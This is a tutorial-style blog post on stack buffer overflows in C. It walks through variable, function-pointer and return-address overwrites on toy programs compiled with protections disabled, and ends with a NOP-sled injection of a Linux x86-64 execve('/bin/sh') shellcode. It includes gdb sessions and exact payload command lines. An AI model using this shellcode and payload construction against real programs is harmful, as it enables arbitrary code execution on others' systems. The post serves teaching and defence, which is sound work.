A buffer overflow is a type of security vulnerability that could be used to execute malicious code. Learn how it works in this blog post.
Variable overwriting
In its simplest form, a buffer overflow overwrites parts of memory that, from a security and safety perspective, the program should not be able to touch. Consider for example this small C program, which has an otherwise unused integer a and copies the first command line argument to the buf array:
#include <stdio.h>  // printf
#include <string.h> // strcpy

int main(int argc, char *argv[]) {
    int a = 0;
    char buf[5];
    strcpy(buf, argv[1]); // no length check: this is the vulnerability
    printf(a != 0 ? "overwritten\n" : "unchanged\n");
}
The integer a is initialized on the stack with value 0, after which a char array of size 5 is allocated on the stack. Because strcpy copies its input without checking the size of the destination, we can input more than 5 characters to overwrite the integer value on the stack. The printf call shows whether that succeeded.
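For contrast, here is a minimal sketch of what a length-checked copy could look like. The helper name copy_checked is hypothetical and not part of the program above; it simply refuses any input that does not fit in the destination, terminating NUL included.

```c
#include <stddef.h>
#include <string.h>

/*
 * Copy src into dst only if it fits, including the terminating NUL.
 * Returns 0 on success and -1 if src is NULL or too long; in the
 * failure case dst is left untouched.
 * copy_checked is a hypothetical helper name used for illustration.
 */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    if (src == NULL || dst_size == 0) {
        return -1;
    }
    size_t len = strlen(src);
    if (len >= dst_size) {
        return -1;              /* would overflow: refuse instead of writing past dst */
    }
    memcpy(dst, src, len + 1);  /* len + 1 also copies the terminating NUL */
    return 0;
}
```

With a 5-byte buffer, a call such as copy_checked(buf, sizeof buf, argv[1]) accepts at most 4 characters, because the fifth byte is needed for the terminating NUL.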
Compiling this with gcc -o buf var.c and passing the six-character input “AAAAAA” makes the program crash with an error message:
$ ./buf AAAAA
unchanged
$ ./buf AAAAAA
unchanged
*** stack smashing detected ***: terminated
Aborted (core dumped)
The program was compiled by gcc to detect buffer overflows like this. It does so with “canaries” (named after the birds used to detect poisonous gas in coal mines): random values placed on the stack next to the arrays, which the binary checks for changes before a function returns. Although this is a brilliant security measure, for educational purposes we want to turn this compiler feature off by invoking gcc with the flag -fno-stack-protector.
$ gcc -o buf var.c -fno-stack-protector
$ ./buf AAAAA
unchanged
$ ./buf AAAAAA
overwritten
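To make the canary idea concrete, here is a toy model in C. It is only a sketch and not how gcc implements the check: the compiler emits the check itself and uses a random value, whereas struct toy_frame, the fixed CANARY_VALUE and the function canary_smashed are hypothetical names chosen for illustration. The "overflow" is simulated by copying bytes into the struct as a whole, which keeps the example well defined.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical fixed value; a real canary is random. */
#define CANARY_VALUE 0xC0FFEE42u

/* Toy stand-in for a stack frame: a buffer, then a canary, then a variable. */
struct toy_frame {
    char buf[5];
    uint32_t canary;
    int a;
};

/*
 * Copy len bytes of input into a fresh toy frame, starting at buf and
 * running on into the following fields if len is large enough.
 * Returns 1 if the canary was altered and 0 if it is intact.
 */
int canary_smashed(const char *input, size_t len)
{
    struct toy_frame f;
    memset(&f, 0, sizeof f);
    f.canary = CANARY_VALUE;

    if (len > sizeof f) {
        len = sizeof f;       /* never write outside the toy frame itself */
    }
    memcpy(&f, input, len);   /* buf is the first member, so this starts at buf */

    return f.canary != CANARY_VALUE;
}
```

Any input long enough to reach the variable a must first run over the canary, so the check catches it before a is ever used.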
Pointer overwriting
As an attacker, it is more interesting to be able to execute code than to just overwrite some value. For now, let’s use a function that we define and compile ourselves:
#include <stdio.h>  // printf
#include <string.h> // strcpy

void malicious() {
    printf("malicious procedure\n");
}

void normal() {
    printf("normal procedure\n");
}

int main(int argc, char *argv[]) {
    void (*fun)() = normal;
    char buf[5];
    strcpy(buf, argv[1]);
    fun();
}
In the main function, the pointer fun points to the function normal and is called at the end. The pointer is pushed to the stack before the char array buf. This allows us to overwrite the function pointer with the address of our malicious code. To find this address, we will use gdb:
$ gcc -o fun fun.c -fno-stack-protector
$ gdb fun
...
(gdb) run AAAA
normal procedure
[Inferior 1 (process 561710) exited normally]
(gdb) info function malicious
Non-debugging symbols:
0x0000555555555149  malicious
This address, 0x0000555555555149, obtained by querying gdb with info function malicious, is the entry point of our malicious function. The leading 0x indicates a hexadecimal value. Every pair of hexadecimal digits represents one byte. We can convert this address into ASCII characters that we can input to overflow the buf array and overwrite the function pointer with the address we want:
echo -n 0000555555555149 | xxd -r -p | od -c
Or use an online hex-to-ASCII converter. The resulting ASCII string is ^@^@UUUUQI, where ^@ denotes the NUL character (od -c prints it as \0). Copy or type the obtained ASCII string and pass it to your program. The NUL characters can be obtained by drawing two NUL bytes from /dev/zero using head or dd:
(gdb) run $(echo "AAAAA$(head -c 2 /dev/zero)UUUUQI")
malicious procedure
(gdb) run $(echo "AAAAA$(dd if=/dev/zero bs=1 count=2)UUUUQI")
malicious procedure
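If you get a segmentation fault instead of the message “malicious procedure”, then you are probably working on a little-endian machine (every x86-64 machine is one), which stores the least significant byte first, so you should input the bytes in reverse order. Note that bash drops NUL bytes in command substitutions, so the two NUL bytes never actually reach the program; the overwrite still works because the two most significant bytes of the original pointer are already zero.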
(gdb) run $(echo "AAAAAIQUUUU$(head -c 2 /dev/zero)")
malicious procedure
(gdb) run $(echo "AAAAAIQUUUU$(dd if=/dev/zero bs=1 count=2)")
malicious procedure
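The byte-order conversion can also be done in a few lines of C instead of with xxd and od. The following is a small sketch; the function name addr_to_le_bytes is hypothetical, and it assumes a 64-bit address that should be laid out least significant byte first, as a little-endian machine expects.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Store the 8 bytes of addr in out, least significant byte first
 * (little-endian order), regardless of the byte order of the machine
 * this code itself runs on.
 */
void addr_to_le_bytes(uint64_t addr, unsigned char out[8])
{
    for (size_t i = 0; i < 8; i++) {
        out[i] = (unsigned char)(addr >> (8 * i));
    }
}
```

For the address 0x0000555555555149 reported by gdb in this section, the resulting bytes are 0x49 0x51 0x55 0x55 0x55 0x55 0x00 0x00, which reads as I Q U U U U followed by two NUL bytes.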
Congrats! You have successfully executed “malicious code” by use of an overflow.
Overwriting Return Addresses
The function pointer fun that pointed to the normal procedure was pushed to the stack of the main function because we declared it ourselves. But we do not have to create a function pointer ourselves to execute our malicious function. When a function is called, a stack frame is created. Before the function is executed, a return address is pushed to the stack. This return address is a way for the processing unit to remember where to continue execution of the program after the function is finished.
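As a small aside, a function can inspect its own return address. The sketch below relies on __builtin_return_address, a builtin offered by GCC and Clang rather than standard C, and the function name my_return_address is hypothetical.

```c
/*
 * Return the address at which execution continues once this function
 * is finished, i.e. the return address stored for this call.
 * noinline keeps this a real call, so that a return address exists.
 * __builtin_return_address is a GCC/Clang extension, not standard C.
 */
__attribute__((noinline)) void *my_return_address(void)
{
    return __builtin_return_address(0);
}
```

Printing the result with printf("%p\n", my_return_address()) from main shows an address inside main's own code, just after the call instruction.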
Consider the following program:
#include <stdio.h>  // printf
#include <stdlib.h> // exit
#include <string.h> // strcpy

void malicious() {
    printf("malicious procedure\n");
    exit(0);
}

void normal() {
    printf("normal procedure\n");
}

void foo(char *src) {
    char buf[100];
    strcpy(buf, src);
    printf("%s\n", buf);
}

int main(int argc, char *argv[]) {
    foo(argv[1]);
    normal();
}
First, foo is executed. If buf is not overflowed, then after foo finishes the processor continues where it left off in the main function and proceeds to execute the function normal. However, we can overflow buf to overwrite the return address in the stack frame of foo and continue execution at an address we choose. To find the right length, we try input strings of repeated A’s of increasing length, starting from 100. The number of A’s needed to reach the return address may differ per machine or compiler; in my case, the A’s started appearing in the return address after length 120 (the hexadecimal value of the character ‘A’ is 41):
$ gcc -o ret ret.c -fno-stack-protector
$ gdb ret
(gdb) run $(head -c 120 /dev/zero | tr '\0' 'A')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe538 in ?? ()
(gdb) run $(head -c 123 /dev/zero | tr '\0' 'A')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000555500414141 in ?? ()
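The offset can be read off the faulting address reported by gdb. The sketch below counts how many of the lowest bytes of that address equal the filler character; the function name count_filler_bytes is hypothetical, and the reasoning assumes a little-endian machine, where the first overflowing bytes land in the low-order bytes of the saved return address.

```c
#include <stdint.h>

/*
 * Count how many consecutive low-order bytes of fault_addr are equal
 * to filler. On a little-endian machine this is the number of filler
 * bytes that spilled into the saved return address.
 */
int count_filler_bytes(uint64_t fault_addr, unsigned char filler)
{
    int count = 0;
    while (count < 8 && ((fault_addr >> (8 * count)) & 0xff) == filler) {
        count++;
    }
    return count;
}
```

For the second run above, the faulting address 0x0000555500414141 contains three bytes with value 0x41, so 3 of the 123 A’s reached the return address and the return address starts at offset 123 - 3 = 120.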
So our attack plan is to put 120 A’s into the buffer, followed by the address of the function malicious:
(gdb) info function malicious
All functions matching regular expression "malicious":
Non-debugging symbols:
0x0000555555555159  malicious
(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo -n 0000555555555159 | xxd -r -p)")
/bin/bash: line 1: warning: command substitution: ignored null byte in input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYQUUUU
malicious procedure
[Inferior 1 (process 666246) exited normally]
Remember that the bytes of the address need to be reversed on little-endian machines (note the YQUUUU at the end of the echoed string above):
(gdb) run $(echo "$(head -c 120 /dev/zero | tr '\0' 'A')$(echo -n 0000555555555159 | xxd -r -p | rev)")
It’s funny how gdb reports successful termination. This is because we deceitfully ended our malicious function with exit(0).
Opening a Linux 64-bit Shell
Instead of having to compile a malicious function, we could fill the buffer with binary code that performs the same function. For example, we could fill the buffer with code that opens a shell for us. From this cool blog post, binary/assembly code that opens a shell on a Linux 64-bit machine is given by this hexadecimal string:
6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05
This piece of assembly makes a system call to execve with the string /bin/sh, which should open a shell for us. So how do we execute this with a buffer overflow? Consider the following program, which, like before, simply echoes back the first command line argument without properly checking its length:
#include <stdio.h>
#include <string.h>

void foo(char *src) {
    char buf[100];
    strcpy(buf, src);
    printf("%s\n", buf);
}

int main(int argc, char *argv[]) {
    foo(argv[1]);
}
Like before, we have to find the return address in the stack frame of the function foo. This time, however, we don’t point to some other function but inside the buffer, where we also put our assembly code that opens a shell. Using gdb, I find again that the return address is overwritten once we get past a string of As of length 120.
Our buffer overflow string will thus be of length 128 and look as follows:
- 60 bytes containing the hex value 90;
- 40 bytes containing the assembly for opening a shell;
- 20 bytes of random data; and
- 8 bytes with the address at which we wish to continue execution.
The first 60 bytes could be random too, but there is a good reason for picking hex value 90. If it is random data, we have to provide the 8 byte address pointing exactly to where our assembly code starts. But now we can point anywhere within the range of the 60 bytes of 0x90, because 0x90 is the NOP code (no operation), telling the processing unit to just skip to the next instruction. This initial range of NOP instructions is called the NOP sled.
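The four-part layout described above can be sketched as a small C function that assembles such a string in memory. This is only an illustration under stated assumptions: the name build_payload and its parameters are hypothetical, the filler is the letter A rather than random data, and the target address is written least significant byte first, as a little-endian machine expects.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NOP_OPCODE 0x90  /* the no-operation byte used for the sled */

/*
 * Lay out, in this order:
 *   sled_len NOP bytes | code | filler_len filler bytes | 8 address bytes
 * The address is written in little-endian order (an assumption about
 * the target machine). Returns the total length, or 0 if the result
 * would not fit in the cap bytes available in out.
 */
size_t build_payload(unsigned char *out, size_t cap,
                     size_t sled_len,
                     const unsigned char *code, size_t code_len,
                     size_t filler_len, uint64_t target)
{
    size_t total = sled_len + code_len + filler_len + 8;
    if (total > cap) {
        return 0;
    }

    unsigned char *p = out;
    memset(p, NOP_OPCODE, sled_len);
    p += sled_len;
    memcpy(p, code, code_len);
    p += code_len;
    memset(p, 'A', filler_len);
    p += filler_len;
    for (size_t i = 0; i < 8; i++) {
        p[i] = (unsigned char)(target >> (8 * i));
    }
    return total;
}
```

Called with a sled of 60, 40 bytes of code and 20 bytes of filler, it produces exactly 60 + 40 + 20 + 8 = 128 bytes, with the address occupying offsets 120 through 127.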
First, we compile the program with gcc and the flag -zexecstack, allowing the program to execute code on the stack.
$ gcc -o asm asm.c -fno-stack-protector -zexecstack
Next, we confirm where the return address starts (in my case, at offset 60+40+20=120):
$ gdb asm
...
(gdb) run $(printf "\x90%.0s" {1..60})$(echo -n 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 | xxd -r -p)$(printf "A%.0s" {1..23})
j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x0000555500414141 in ?? ()
Here, I use printf "\x90%.0s" {1..60} to generate 60 NOP bytes. This is followed by the 40 bytes of code opening a shell, and finally, 23 As. We can see that 3 As appear in the return address. To figure out which address to write over the return address, we use the x command in gdb to find the NOP sled. We look at 100 four-byte words (x/100x), starting 200 bytes before the stack pointer $rsp:
(gdb) x/100x $rsp-200
0x7fffffffe2a8: 0xffffe4a8 0x00007fff 0x00000002 0x00000000
0x7fffffffe2b8: 0x00000000 0x00000000 0xf7ffd000 0x00007fff
0x7fffffffe2c8: 0x55557dd8 0x00005555 0xffffe360 0x00007fff
0x7fffffffe2d8: 0x55555174 0x00005555 0x004a0000 0x00000000
0x7fffffffe2e8: 0xffffe7f5 0x00007fff 0x90909090 0x90909090
0x7fffffffe2f8: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe308: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe318: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe328: 0x90909090 0x48583b6a 0xb849d231 0x69622f2f
0x7fffffffe338: 0x68732f6e 0x08e8c149 0x89485041 0x485752e7
0x7fffffffe348: 0x050fe689 0x48583c6a 0x050fff31 0x41414141
0x7fffffffe358: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe368: 0x00414141 0x00005555 0xffffe4a8 0x00007fff
0x7fffffffe378: 0xffffe4a8 0x00000002 0xffffe420 0x00007fff
0x7fffffffe388: 0xf7dae488 0x00007fff 0xffffe3d0 0x00007fff
0x7fffffffe398: 0xffffe4a8 0x00007fff 0x55554040 0x00000002
0x7fffffffe3a8: 0x55555177 0x00005555 0xffffe4a8 0x00007fff
0x7fffffffe3b8: 0xafc58c2c 0xf6337170 0x00000002 0x00000000
0x7fffffffe3c8: 0x00000000 0x00000000 0xf7ffd000 0x00007fff
0x7fffffffe3d8: 0x55557dd8 0x00005555 0xa0a58c2c 0xf6337170
0x7fffffffe3e8: 0xaffb8c2c 0xf633613a 0x00000000 0x00007fff
0x7fffffffe3f8: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe408: 0x00000002 0x00000000 0xffffe4a0 0x00007fff
0x7fffffffe418: 0xa74d6e00 0xa0240718 0xffffe480 0x00007fff
0x7fffffffe428: 0xf7dae54c 0x00007fff 0xffffe4c0 0x00007fff
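The NOP sled spans the addresses 0x7fffffffe2f0 through 0x7fffffffe32b: it begins in the row ending in e2e8 and ends in the row ending in e328. Let’s pick 0x7fffffffe318, inside the sled, as the address at which to continue execution; the NOPs then lead straight into our shell-opening code (I’m on a little-endian machine, so I use the reversed byte order).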
(gdb) run $(printf "\x90%.0s" {1..60})$(echo -n 6a3b584831d249b82f2f62696e2f736849c1e80841504889e752574889e60f056a3c584831ff0f05 | xxd -r -p)$(printf "A%.0s" {1..20})$(echo -n 18e3ffffff7f | xxd -r -p)
j;XH1�//bin/shI�APH�WH�j<XH1AAAAAAAAAAAAAAAAAAAA�
sh-5.2$
That’s it! A shell opened! Notice again that if we exit the shell, gdb reports a normal exit. Again, this is because the 40-byte assembly code ends with an exit(0) system call.
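The choice of landing address can be double-checked with a one-line range test. This is a minimal sketch with a hypothetical function name, lands_in_sled; the sled start 0x7fffffffe2f0 is read off the memory dump above (the third word of the row ending in e2e8) and will differ on other machines.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Return 1 if target lies inside the sled, i.e. in the half-open
 * range [sled_start, sled_start + sled_len), and 0 otherwise.
 */
int lands_in_sled(uint64_t target, uint64_t sled_start, size_t sled_len)
{
    return target >= sled_start && target - sled_start < sled_len;
}
```

With a sled of 60 bytes starting at 0x7fffffffe2f0, the address 0x7fffffffe318 lies 40 bytes into the sled, so execution slides over the remaining 20 NOPs before reaching the first instruction of the shell-opening code at 0x7fffffffe32c.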